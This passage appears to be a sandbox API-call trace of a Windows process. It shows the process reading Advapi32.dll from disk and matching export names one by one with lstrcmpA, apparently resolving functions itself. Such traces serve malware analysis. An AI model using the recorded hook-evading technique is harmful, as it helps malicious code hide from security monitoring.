lpString2="AppCacheFreeGroupList") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0084.689] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0084.689] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0084.689] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0084.690] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0084.826] GetProcessHeap () returned 0x570000 [0084.826] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4172040 | out: hHeap=0x570000) returned 1 [0084.844] GetProcessHeap () returned 0x570000 [0084.844] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x589080 [0084.848] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0084.848] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0084.848] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0084.848] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0084.849] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0084.849] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0084.849] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0084.849] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0084.849] GetProcessHeap () returned 0x570000 [0084.849] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa3ef0) returned 0x2db2010 [0085.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0085.008] ReadFile (in: hFile=0x140, lpBuffer=0x2db2010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db2010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0085.050] CloseHandle (hObject=0x140) returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0085.051] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0085.051] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0085.051] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0085.052] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0085.052] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0085.053] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.054] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.055] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.056] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0085.056] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.056] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.056] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.056] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0085.056] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.057] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0085.058] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0085.059] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0085.059] lstrcmpA 